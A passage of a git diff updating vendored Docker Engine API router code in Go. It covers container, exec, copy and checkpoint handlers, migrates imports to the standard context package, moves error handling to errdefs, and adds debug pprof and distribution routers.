+package checkpoint // import "github.com/docker/docker/api/server/router/checkpoint"
 
 import (
+	"context"
 	"encoding/json"
 	"net/http"
 
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 func (s *checkpointRouter) postContainerCheckpoint(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
diff --git a/vendor/github.com/docker/docker/api/server/router/container/backend.go b/vendor/github.com/docker/docker/api/server/router/container/backend.go
index 0d20188ccf..75ea1d82b7 100644
--- a/vendor/github.com/docker/docker/api/server/router/container/backend.go
+++ b/vendor/github.com/docker/docker/api/server/router/container/backend.go
@@ -1,15 +1,14 @@
-package container
+package container // import "github.com/docker/docker/api/server/router/container"
 
 import (
+	"context"
 	"io"
-	"time"
-
-	"golang.org/x/net/context"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/filters"
+	containerpkg "github.com/docker/docker/container"
 	"github.com/docker/docker/pkg/archive"
 )
 
@@ -18,7 +17,7 @@ type execBackend interface {
 	ContainerExecCreate(name string, config *types.ExecConfig) (string, error)
 	ContainerExecInspect(id string) (*backend.ExecInspect, error)
 	ContainerExecResize(name string, height, width int) error
-	ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) error
+	ContainerExecStart(ctx context.Context, name string, stdin io.Reader, stdout io.Writer, stderr io.Writer) error
 	ExecExists(name string) (bool, error)
 }
 
@@ -27,7 +26,7 @@ type copyBackend interface {
 	ContainerArchivePath(name string, path string) (content io.ReadCloser, stat *types.ContainerPathStat, err error)
 	ContainerCopy(name string, res string) (io.ReadCloser, error)
 	ContainerExport(name string, out io.Writer) error
-	ContainerExtractToDir(name, path string, noOverwriteDirNonDir bool, content io.Reader) error
+	ContainerExtractToDir(name, path string, copyUIDGID, noOverwriteDirNonDir bool, content io.Reader) error
 	ContainerStatPath(name string, path string) (stat *types.ContainerPathStat, err error)
 }
 
@@ -44,16 +43,16 @@ type stateBackend interface {
 	ContainerStop(name string, seconds *int) error
 	ContainerUnpause(name string) error
 	ContainerUpdate(name string, hostConfig *container.HostConfig) (container.ContainerUpdateOKBody, error)
-	ContainerWait(name string, timeout time.Duration) (int, error)
+	ContainerWait(ctx context.Context, name string, condition containerpkg.WaitCondition) (<-chan containerpkg.StateStatus, error)
 }
 
 // monitorBackend includes functions to implement to provide containers monitoring functionality.
 type monitorBackend interface {
 	ContainerChanges(name string) ([]archive.Change, error)
 	ContainerInspect(name string, size bool, version string) (interface{}, error)
-	ContainerLogs(ctx context.Context, name string, config *backend.ContainerLogsConfig, started chan struct{}) error
+	ContainerLogs(ctx context.Context, name string, config *types.ContainerLogsOptions) (msgs <-chan *backend.LogMessage, tty bool, err error)
 	ContainerStats(ctx context.Context, name string, config *backend.ContainerStatsConfig) error
-	ContainerTop(name string, psArgs string) (*types.ContainerProcessList, error)
+	ContainerTop(name string, psArgs string) (*container.ContainerTopOKBody, error)
 
 	Containers(config *types.ContainerListOptions) ([]*types.Container, error)
 }
@@ -65,11 +64,16 @@ type attachBackend interface {
 
 // systemBackend includes functions to implement to provide system wide containers functionality
 type systemBackend interface {
-	ContainersPrune(pruneFilters filters.Args) (*types.ContainersPruneReport, error)
+	ContainersPrune(ctx context.Context, pruneFilters filters.Args) (*types.ContainersPruneReport, error)
+}
+
+type commitBackend interface {
+	CreateImageFromContainer(name string, config *backend.CreateImageConfig) (imageID string, err error)
 }
 
 // Backend is all the methods that need to be implemented to provide container specific functionality.
 type Backend interface {
+	commitBackend
 	execBackend
 	copyBackend
 	stateBackend
diff --git a/vendor/github.com/docker/docker/api/server/router/container/container.go b/vendor/github.com/docker/docker/api/server/router/container/container.go
index bbed7e9944..358f2bc2c1 100644
--- a/vendor/github.com/docker/docker/api/server/router/container/container.go
+++ b/vendor/github.com/docker/docker/api/server/router/container/container.go
@@ -1,18 +1,10 @@
-package container
+package container // import "github.com/docker/docker/api/server/router/container"
 
 import (
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/server/router"
 )
 
-type validationError struct {
-	error
-}
-
-func (validationError) IsValidationError() bool {
-	return true
-}
-
 // containerRouter is a router to talk with the container controller
 type containerRouter struct {
 	backend Backend
@@ -46,8 +38,8 @@ func (r *containerRouter) initRoutes() {
 		router.NewGetRoute("/containers/{name:.*}/changes", r.getContainersChanges),
 		router.NewGetRoute("/containers/{name:.*}/json", r.getContainersByName),
 		router.NewGetRoute("/containers/{name:.*}/top", r.getContainersTop),
-		router.Cancellable(router.NewGetRoute("/containers/{name:.*}/logs", r.getContainersLogs)),
-		router.Cancellable(router.NewGetRoute("/containers/{name:.*}/stats", r.getContainersStats)),
+		router.NewGetRoute("/containers/{name:.*}/logs", r.getContainersLogs, router.WithCancel),
+		router.NewGetRoute("/containers/{name:.*}/stats", r.getContainersStats, router.WithCancel),
 		router.NewGetRoute("/containers/{name:.*}/attach/ws", r.wsContainersAttach),
 		router.NewGetRoute("/exec/{id:.*}/json", r.getExecByID),
 		router.NewGetRoute("/containers/{name:.*}/archive", r.getContainersArchive),
@@ -59,7 +51,7 @@ func (r *containerRouter) initRoutes() {
 		router.NewPostRoute("/containers/{name:.*}/restart", r.postContainersRestart),
 		router.NewPostRoute("/containers/{name:.*}/start", r.postContainersStart),
 		router.NewPostRoute("/containers/{name:.*}/stop", r.postContainersStop),
-		router.NewPostRoute("/containers/{name:.*}/wait", r.postContainersWait),
+		router.NewPostRoute("/containers/{name:.*}/wait", r.postContainersWait, router.WithCancel),
 		router.NewPostRoute("/containers/{name:.*}/resize", r.postContainersResize),
 		router.NewPostRoute("/containers/{name:.*}/attach", r.postContainersAttach),
 		router.NewPostRoute("/containers/{name:.*}/copy", r.postContainersCopy), // Deprecated since 1.8, Errors out since 1.12
@@ -68,7 +60,8 @@ func (r *containerRouter) initRoutes() {
 		router.NewPostRoute("/exec/{name:.*}/resize", r.postContainerExecResize),
 		router.NewPostRoute("/containers/{name:.*}/rename", r.postContainerRename),
 		router.NewPostRoute("/containers/{name:.*}/update", r.postContainerUpdate),
-		router.NewPostRoute("/containers/prune", r.postContainersPrune),
+		router.NewPostRoute("/containers/prune", r.postContainersPrune, router.WithCancel),
+		router.NewPostRoute("/commit", r.postCommit),
 		// PUT
 		router.NewPutRoute("/containers/{name:.*}/archive", r.putContainersArchive),
 		// DELETE
diff --git a/vendor/github.com/docker/docker/api/server/router/container/container_routes.go b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go
index 9c9bc0f8c3..9282cea09c 100644
--- a/vendor/github.com/docker/docker/api/server/router/container/container_routes.go
+++ b/vendor/github.com/docker/docker/api/server/router/container/container_routes.go
@@ -1,32 +1,73 @@
-package container
+package container // import "github.com/docker/docker/api/server/router/container"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"net/http"
 	"strconv"
 	"syscall"
-	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/versions"
+	containerpkg "github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/signal"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 	"golang.org/x/net/websocket"
 )
 
+func (s *containerRouter) postCommit(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	if err := httputils.ParseForm(r); err != nil {
+		return err
+	}
+
+	if err := httputils.CheckForJSON(r); err != nil {
+		return err
+	}
+
+	// TODO: remove pause arg, and always pause in backend
+	pause := httputils.BoolValue(r, "pause")
+	version := httputils.VersionFromContext(ctx)
+	if r.FormValue("pause") == "" && versions.GreaterThanOrEqualTo(version, "1.13") {
+		pause = true
+	}
+
+	config, _, _, err := s.decoder.DecodeConfig(r.Body)
+	if err != nil && err != io.EOF { //Do not fail if body is empty.
+		return err
+	}
+
+	commitCfg := &backend.CreateImageConfig{
+		Pause:   pause,
+		Repo:    r.Form.Get("repo"),
+		Tag:     r.Form.Get("tag"),
+		Author:  r.Form.Get("author"),
+		Comment: r.Form.Get("comment"),
+		Config:  config,
+		Changes: r.Form["changes"],
+	}
+
+	imgID, err := s.backend.CreateImageFromContainer(r.Form.Get("container"), commitCfg)
+	if err != nil {
+		return err
+	}
+
+	return httputils.WriteJSON(w, http.StatusCreated, &types.IDResponse{ID: imgID})
+}
+
 func (s *containerRouter) getContainersJSON(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
 	}
-	filter, err := filters.FromParam(r.Form.Get("filters"))
+	filter, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
 		return err
 	}
@@ -68,7 +109,7 @@ func (s *containerRouter) getContainersStats(ctx context.Context, w http.Respons
 	config := &backend.ContainerStatsConfig{
 		Stream:    stream,
 		OutStream: w,
-		Version:   string(httputils.VersionFromContext(ctx)),
+		Version:   httputils.VersionFromContext(ctx),
 	}
 
 	return s.backend.ContainerStats(ctx, vars["name"], config)
@@ -86,36 +127,31 @@ func (s *containerRouter) getContainersLogs(ctx context.Context, w http.Response
 	// with the appropriate status code.
 	stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr")
 	if !(stdout || stderr) {
-		return fmt.Errorf("Bad parameters: you must choose at least one stream")
+		return errdefs.InvalidParameter(errors.New("Bad parameters: you must choose at least one stream"))
 	}
 
 	containerName := vars["name"]
-	logsConfig := &backend.ContainerLogsConfig{
-		ContainerLogsOptions: types.ContainerLogsOptions{
-			Follow:     httputils.BoolValue(r, "follow"),
-			Timestamps: httputils.BoolValue(r, "timestamps"),
-			Since:      r.Form.Get("since"),
-			Tail:       r.Form.Get("tail"),
-			ShowStdout: stdout,
-			ShowStderr: stderr,
-			Details:    httputils.BoolValue(r, "details"),
-		},
-		OutStream: w,
-	}
-
-	chStarted := make(chan struct{})
-	if err := s.backend.ContainerLogs(ctx, containerName, logsConfig, chStarted); err != nil {
-		select {
-		case <-chStarted:
-			// The client may be expecting all of the data we're sending to
-			// be multiplexed, so send it through OutStream, which will
-			// have been set up to handle that if needed.
-			fmt.Fprintf(logsConfig.OutStream, "Error running logs job: %v\n", err)
-		default:
-			return err
-		}
+	logsConfig := &types.ContainerLogsOptions{
+		Follow:     httputils.BoolValue(r, "follow"),
+		Timestamps: httputils.BoolValue(r, "timestamps"),
+		Since:      r.Form.Get("since"),
+		Until:      r.Form.Get("until"),
+		Tail:       r.Form.Get("tail"),
+		ShowStdout: stdout,
+		ShowStderr: stderr,
+		Details:    httputils.BoolValue(r, "details"),
+	}
+
+	msgs, tty, err := s.backend.ContainerLogs(ctx, containerName, logsConfig)
+	if err != nil {
+		return err
 	}
 
+	// if has a tty, we're not muxing streams. if it doesn't, we are. simple.
+	// this is the point of no return for writing a response. once we call
+	// WriteLogStream, the response has been started and errors will be
+	// returned in band by WriteLogStream
+	httputils.WriteLogStream(ctx, w, msgs, logsConfig, !tty)
 	return nil
 }
 
@@ -123,6 +159,14 @@ func (s *containerRouter) getContainersExport(ctx context.Context, w http.Respon
 	return s.backend.ContainerExport(vars["name"], w)
 }
 
+type bodyOnStartError struct{}
+
+func (bodyOnStartError) Error() string {
+	return "starting container with non-empty request body was deprecated since API v1.22 and removed in v1.24"
+}
+
+func (bodyOnStartError) InvalidParameter() {}
+
 func (s *containerRouter) postContainersStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	// If contentLength is -1, we can assumed chunked encoding
 	// or more technically that the length is unknown
@@ -136,7 +180,7 @@ func (s *containerRouter) postContainersStart(ctx context.Context, w http.Respon
 	// A non-nil json object is at least 7 characters.
 	if r.ContentLength > 7 || r.ContentLength == -1 {
 		if versions.GreaterThanOrEqualTo(version, "1.24") {
-			return validationError{fmt.Errorf("starting container with non-empty request body was deprecated since v1.10 and removed in v1.12")}
+			return bodyOnStartError{}
 		}
 
 		if err := httputils.CheckForJSON(r); err != nil {
@@ -186,10 +230,6 @@ func (s *containerRouter) postContainersStop(ctx context.Context, w http.Respons
 	return nil
 }
 
-type errContainerIsRunning interface {
-	ContainerIsRunning() bool
-}
-
 func (s *containerRouter) postContainersKill(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
@@ -202,14 +242,14 @@ func (s *containerRouter) postContainersKill(ctx context.Context, w http.Respons
 	if sigStr := r.Form.Get("signal"); sigStr != "" {
 		var err error
 		if sig, err = signal.ParseSignal(sigStr); err != nil {
-			return err
+			return errdefs.InvalidParameter(err)
 		}
 	}
 
 	if err := s.backend.ContainerKill(name, uint64(sig)); err != nil {
 		var isStopped bool
-		if e, ok := err.(errContainerIsRunning); ok {
-			isStopped = !e.ContainerIsRunning()
+		if errdefs.IsConflict(err) {
+			isStopped = true
 		}
 
 		// Return error that's not caused because the container is stopped.
@@ -217,7 +257,7 @@ func (s *containerRouter) postContainersKill(ctx context.Context, w http.Respons
 		// to keep backwards compatibility.
 		version := httputils.VersionFromContext(ctx)
 		if versions.GreaterThanOrEqualTo(version, "1.20") || !isStopped {
-			return fmt.Errorf("Cannot kill container %s: %v", name, err)
+			return errors.Wrapf(err, "Cannot kill container: %s", name)
 		}
 	}
 
@@ -277,13 +317,64 @@ func (s *containerRouter) postContainersUnpause(ctx context.Context, w http.Resp
 }
 
 func (s *containerRouter) postContainersWait(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
-	status, err := s.backend.ContainerWait(vars["name"], -1*time.Second)
+	// Behavior changed in version 1.30 to handle wait condition and to
+	// return headers immediately.
+	version := httputils.VersionFromContext(ctx)
+	legacyBehaviorPre130 := versions.LessThan(version, "1.30")
+	legacyRemovalWaitPre134 := false
+
+	// The wait condition defaults to "not-running".
+	waitCondition := containerpkg.WaitConditionNotRunning
+	if !legacyBehaviorPre130 {
+		if err := httputils.ParseForm(r); err != nil {
+			return err
+		}
+		switch container.WaitCondition(r.Form.Get("condition")) {
+		case container.WaitConditionNextExit:
+			waitCondition = containerpkg.WaitConditionNextExit
+		case container.WaitConditionRemoved:
+			waitCondition = containerpkg.WaitConditionRemoved
+			legacyRemovalWaitPre134 = versions.LessThan(version, "1.34")
+		}
+	}
+
+	// Note: the context should get canceled if the client closes the
+	// connection since this handler has been wrapped by the
+	// router.WithCancel() wrapper.
+	waitC, err := s.backend.ContainerWait(ctx, vars["name"], waitCondition)
 	if err != nil {
 		return err
 	}
 
-	return httputils.WriteJSON(w, http.StatusOK, &container.ContainerWaitOKBody{
-		StatusCode: int64(status),
+	w.Header().Set("Content-Type", "application/json")
+
+	if !legacyBehaviorPre130 {
+		// Write response header immediately.
+		w.WriteHeader(http.StatusOK)
+		if flusher, ok := w.(http.Flusher); ok {
+			flusher.Flush()
+		}
+	}
+
+	// Block on the result of the wait operation.
+	status := <-waitC
+
+	// With API < 1.34, wait on WaitConditionRemoved did not return
+	// in case container removal failed. The only way to report an
+	// error back to the client is to not write anything (i.e. send
+	// an empty response which will be treated as an error).
+	if legacyRemovalWaitPre134 && status.Err() != nil {
+		return nil
+	}
+
+	var waitError *container.ContainerWaitOKBodyError
+	if status.Err() != nil {
+		waitError = &container.ContainerWaitOKBodyError{Message: status.Err().Error()}
+	}
+
+	return json.NewEncoder(w).Encode(&container.ContainerWaitOKBody{
+		StatusCode: int64(status.ExitCode()),
+		Error:      waitError,
 	})
 }
 
@@ -369,6 +460,11 @@ func (s *containerRouter) postContainersCreate(ctx context.Context, w http.Respo
 	version := httputils.VersionFromContext(ctx)
 	adjustCPUShares := versions.LessThan(version, "1.19")
 
+	// When using API 1.24 and under, the client is responsible for removing the container
+	if hostConfig != nil && versions.LessThan(version, "1.25") {
+		hostConfig.AutoRemove = false
+	}
+
 	ccr, err := s.backend.ContainerCreate(types.ContainerCreateConfig{
 		Name:             name,
 		Config:           config,
@@ -411,11 +507,11 @@ func (s *containerRouter) postContainersResize(ctx context.Context, w http.Respo
 
 	height, err := strconv.Atoi(r.Form.Get("h"))
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 	width, err := strconv.Atoi(r.Form.Get("w"))
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 
 	return s.backend.ContainerResize(vars["name"], height, width)
@@ -433,7 +529,7 @@ func (s *containerRouter) postContainersAttach(ctx context.Context, w http.Respo
 
 	hijacker, ok := w.(http.Hijacker)
 	if !ok {
-		return fmt.Errorf("error attaching to container %s, hijack connection missing", containerName)
+		return errdefs.InvalidParameter(errors.Errorf("error attaching to container %s, hijack connection missing", containerName))
 	}
 
 	setupStreams := func() (io.ReadCloser, io.Writer, io.Writer, error) {
@@ -497,6 +593,8 @@ func (s *containerRouter) wsContainersAttach(ctx context.Context, w http.Respons
 	done := make(chan struct{})
 	started := make(chan struct{})
 
+	version := httputils.VersionFromContext(ctx)
+
 	setupStreams := func() (io.ReadCloser, io.Writer, io.Writer, error) {
 		wsChan := make(chan *websocket.Conn)
 		h := func(conn *websocket.Conn) {
@@ -511,6 +609,11 @@ func (s *containerRouter) wsContainersAttach(ctx context.Context, w http.Respons
 		}()
 
 		conn := <-wsChan
+		// In case version 1.28 and above, a binary frame will be sent.
+		// See 28176 for details.
+		if versions.GreaterThanOrEqualTo(version, "1.28") {
+			conn.PayloadType = websocket.BinaryFrame
+		}
 		return conn, conn, conn, nil
 	}
 
@@ -529,7 +632,11 @@ func (s *containerRouter) wsContainersAttach(ctx context.Context, w http.Respons
 	close(done)
 	select {
 	case <-started:
-		logrus.Errorf("Error attaching websocket: %s", err)
+		if err != nil {
+			logrus.Errorf("Error attaching websocket: %s", err)
+		} else {
+			logrus.Debug("websocket connection was closed by client")
+		}
 		return nil
 	default:
 	}
@@ -541,12 +648,12 @@ func (s *containerRouter) postContainersPrune(ctx context.Context, w http.Respon
 		return err
 	}
 
-	pruneFilters, err := filters.FromParam(r.Form.Get("filters"))
+	pruneFilters, err := filters.FromJSON(r.Form.Get("filters"))
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 
-	pruneReport, err := s.backend.ContainersPrune(pruneFilters)
+	pruneReport, err := s.backend.ContainersPrune(ctx, pruneFilters)
 	if err != nil {
 		return err
 	}
diff --git a/vendor/github.com/docker/docker/api/server/router/container/copy.go b/vendor/github.com/docker/docker/api/server/router/container/copy.go
index ede6dff92c..837836d001 100644
--- a/vendor/github.com/docker/docker/api/server/router/container/copy.go
+++ b/vendor/github.com/docker/docker/api/server/router/container/copy.go
@@ -1,20 +1,28 @@
-package container
+package container // import "github.com/docker/docker/api/server/router/container"
 
 import (
+	"compress/flate"
+	"compress/gzip"
+	"context"
 	"encoding/base64"
 	"encoding/json"
-	"fmt"
 	"io"
 	"net/http"
-	"os"
-	"strings"
 
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/versions"
-	"golang.org/x/net/context"
+	gddohttputil "github.com/golang/gddo/httputil"
 )
 
+type pathError struct{}
+
+func (pathError) Error() string {
+	return "Path cannot be empty"
+}
+
+func (pathError) InvalidParameter() {}
+
 // postContainersCopy is deprecated in favor of getContainersArchive.
 func (s *containerRouter) postContainersCopy(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	// Deprecated since 1.8, Errors out since 1.12
@@ -33,28 +41,18 @@ func (s *containerRouter) postContainersCopy(ctx context.Context, w http.Respons
 	}
 
 	if cfg.Resource == "" {
-		return fmt.Errorf("Path cannot be empty")
+		return pathError{}
 	}
 
 	data, err := s.backend.ContainerCopy(vars["name"], cfg.Resource)
 	if err != nil {
-		if strings.Contains(strings.ToLower(err.Error()), "no such container") {
-			w.WriteHeader(http.StatusNotFound)
-			return nil
-		}
-		if os.IsNotExist(err) {
-			return fmt.Errorf("Could not find the file %s in container %s", cfg.Resource, vars["name"])
-		}
 		return err
 	}
 	defer data.Close()
 
 	w.Header().Set("Content-Type", "application/x-tar")
-	if _, err := io.Copy(w, data); err != nil {
-		return err
-	}
-
-	return nil
+	_, err = io.Copy(w, data)
+	return err
 }
 
 // // Encode the stat to JSON, base64 encode, and place in a header.
@@ -86,6 +84,29 @@ func (s *containerRouter) headContainersArchive(ctx context.Context, w http.Resp
 	return setContainerPathStatHeader(stat, w.Header())
 }
 
+func writeCompressedResponse(w http.ResponseWriter, r *http.Request, body io.Reader) error {
+	var cw io.Writer
+	switch gddohttputil.NegotiateContentEncoding(r, []string{"gzip", "deflate"}) {
+	case "gzip":
+		gw := gzip.NewWriter(w)
+		defer gw.Close()
+		cw = gw
+		w.Header().Set("Content-Encoding", "gzip")
+	case "deflate":
+		fw, err := flate.NewWriter(w, flate.DefaultCompression)
+		if err != nil {
+			return err
+		}
+		defer fw.Close()
+		cw = fw
+		w.Header().Set("Content-Encoding", "deflate")
+	default:
+		cw = w
+	}
+	_, err := io.Copy(cw, body)
+	return err
+}
+
 func (s *containerRouter) getContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	v, err := httputils.ArchiveFormValues(r, vars)
 	if err != nil {
@@ -103,9 +124,7 @@ func (s *containerRouter) getContainersArchive(ctx context.Context, w http.Respo
 	}
 
 	w.Header().Set("Content-Type", "application/x-tar")
-	_, err = io.Copy(w, tarArchive)
-
-	return err
+	return writeCompressedResponse(w, r, tarArchive)
 }
 
 func (s *containerRouter) putContainersArchive(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -115,5 +134,7 @@ func (s *containerRouter) putContainersArchive(ctx context.Context, w http.Respo
 	}
 
 	noOverwriteDirNonDir := httputils.BoolValue(r, "noOverwriteDirNonDir")
-	return s.backend.ContainerExtractToDir(v.Name, v.Path, noOverwriteDirNonDir, r.Body)
+	copyUIDGID := httputils.BoolValue(r, "copyUIDGID")
+
+	return s.backend.ContainerExtractToDir(v.Name, v.Path, copyUIDGID, noOverwriteDirNonDir, r.Body)
 }
diff --git a/vendor/github.com/docker/docker/api/server/router/container/exec.go b/vendor/github.com/docker/docker/api/server/router/container/exec.go
index 1134a0e797..25125edb5f 100644
--- a/vendor/github.com/docker/docker/api/server/router/container/exec.go
+++ b/vendor/github.com/docker/docker/api/server/router/container/exec.go
@@ -1,18 +1,19 @@
-package container
+package container // import "github.com/docker/docker/api/server/router/container"
 
 import (
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
 	"net/http"
 	"strconv"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/stdcopy"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 func (s *containerRouter) getExecByID(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
@@ -24,6 +25,14 @@ func (s *containerRouter) getExecByID(ctx context.Context, w http.ResponseWriter
 	return httputils.WriteJSON(w, http.StatusOK, eConfig)
 }
 
+type execCommandError struct{}
+
+func (execCommandError) Error() string {
+	return "No exec command specified"
+}
+
+func (execCommandError) InvalidParameter() {}
+
 func (s *containerRouter) postContainerExecCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
 	if err := httputils.ParseForm(r); err != nil {
 		return err
@@ -39,7 +48,7 @@ func (s *containerRouter) postContainerExecCreate(ctx context.Context, w http.Re
 	}
 
 	if len(execConfig.Cmd) == 0 {
-		return fmt.Errorf("No exec command specified")
+		return execCommandError{}
 	}
 
 	// Register an instance of Exec in container.
@@ -118,7 +127,7 @@ func (s *containerRouter) postContainerExecStart(ctx context.Context, w http.Res
 			return err
 		}
 		stdout.Write([]byte(err.Error() + "\r\n"))
-		logrus.Errorf("Error running exec in container: %v", err)
+		logrus.Errorf("Error running exec %s in container: %v", execName, err)
 	}
 	return nil
 }
@@ -129,11 +138,11 @@ func (s *containerRouter) postContainerExecResize(ctx context.Context, w http.Re
 	}
 	height, err := strconv.Atoi(r.Form.Get("h"))
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 	width, err := strconv.Atoi(r.Form.Get("w"))
 	if err != nil {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 
 	return s.backend.ContainerExecResize(vars["name"], height, width)
diff --git a/vendor/github.com/docker/docker/api/server/router/container/inspect.go b/vendor/github.com/docker/docker/api/server/router/container/inspect.go
index dbbced7eee..5c78d15bc9 100644
--- a/vendor/github.com/docker/docker/api/server/router/container/inspect.go
+++ b/vendor/github.com/docker/docker/api/server/router/container/inspect.go
@@ -1,10 +1,10 @@
-package container
+package container // import "github.com/docker/docker/api/server/router/container"
 
 import (
+	"context"
 	"net/http"
 
 	"github.com/docker/docker/api/server/httputils"
-	"golang.org/x/net/context"
 )
 
 // getContainersByName inspects container's configuration and serializes it as json.
diff --git a/vendor/github.com/docker/docker/api/server/router/debug/debug.go b/vendor/github.com/docker/docker/api/server/router/debug/debug.go
new file mode 100644
index 0000000000..ad05b68eb9
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/debug/debug.go
@@ -0,0 +1,53 @@
+package debug // import "github.com/docker/docker/api/server/router/debug"
+
+import (
+	"context"
+	"expvar"
+	"net/http"
+	"net/http/pprof"
+
+	"github.com/docker/docker/api/server/httputils"
+	"github.com/docker/docker/api/server/router"
+)
+
+// NewRouter creates a new debug router
+// The debug router holds endpoints for debug the daemon, such as those for pprof.
+func NewRouter() router.Router {
+	r := &debugRouter{}
+	r.initRoutes()
+	return r
+}
+
+type debugRouter struct {
+	routes []router.Route
+}
+
+func (r *debugRouter) initRoutes() {
+	r.routes = []router.Route{
+		router.NewGetRoute("/vars", frameworkAdaptHandler(expvar.Handler())),
+		router.NewGetRoute("/pprof/", frameworkAdaptHandlerFunc(pprof.Index)),
+		router.NewGetRoute("/pprof/cmdline", frameworkAdaptHandlerFunc(pprof.Cmdline)),
+		router.NewGetRoute("/pprof/profile", frameworkAdaptHandlerFunc(pprof.Profile)),
+		router.NewGetRoute("/pprof/symbol", frameworkAdaptHandlerFunc(pprof.Symbol)),
+		router.NewGetRoute("/pprof/trace", frameworkAdaptHandlerFunc(pprof.Trace)),
+		router.NewGetRoute("/pprof/{name}", handlePprof),
+	}
+}
+
+func (r *debugRouter) Routes() []router.Route {
+	return r.routes
+}
+
+func frameworkAdaptHandler(handler http.Handler) httputils.APIFunc {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		handler.ServeHTTP(w, r)
+		return nil
+	}
+}
+
+func frameworkAdaptHandlerFunc(handler http.HandlerFunc) httputils.APIFunc {
+	return func(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+		handler(w, r)
+		return nil
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/debug/debug_routes.go b/vendor/github.com/docker/docker/api/server/router/debug/debug_routes.go
new file mode 100644
index 0000000000..125bed72b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/debug/debug_routes.go
@@ -0,0 +1,12 @@
+package debug // import "github.com/docker/docker/api/server/router/debug"
+
+import (
+	"context"
+	"net/http"
+	"net/http/pprof"
+)
+
+func handlePprof(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
+	pprof.Handler(vars["name"]).ServeHTTP(w, r)
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/distribution/backend.go b/vendor/github.com/docker/docker/api/server/router/distribution/backend.go
new file mode 100644
index 0000000000..5b881f036b
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/distribution/backend.go
@@ -0,0 +1,15 @@
+package distribution // import "github.com/docker/docker/api/server/router/distribution"
+
+import (
+	"context"
+
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+)
+
+// Backend is all the methods that need to be implemented
+// to provide image specific functionality.
+type Backend interface {
+	GetRepository(context.Context, reference.Named, *types.AuthConfig) (distribution.Repository, bool, error)
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/distribution/distribution.go b/vendor/github.com/docker/docker/api/server/router/distribution/distribution.go
new file mode 100644
index 0000000000..1e9e5ff836
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/distribution/distribution.go
@@ -0,0 +1,31 @@
+package distribution // import "github.com/docker/docker/api/server/router/distribution"
+
+import "github.com/docker/docker/api/server/router"
+
+// distributionRouter is a router to talk with the registry
+type distributionRouter struct {
+	backend Backend
+	routes  []router.Route
+}
+
+// NewRouter initializes a new distribution router
+func NewRouter(backend Backend) router.Router {
+	r := &distributionRouter{
+		backend: backend,
+	}
+	r.initRoutes()
+	return r
+}
+
+// Routes returns the available routes
+func (r *distributionRouter) Routes() []router.Route {
+	return r.routes
+}
+
+// initRoutes initializes the routes in the distribution router
+func (r *distributionRouter) initRoutes() {
+	r.routes = []router.Route{
+		// GET
+		router.NewGetRoute("/distribution/{name:.*}/json", r.getDistributionInfo),
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/router/distribution/distribution_routes.go b/vendor/github.com/docker/docker/api/server/router/distribution/distribution_routes.go
new file mode 100644
index 0000000000..531dba69fc
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/router/distribution/distribution_routes.go
@@ -0,0 +1,138 @@
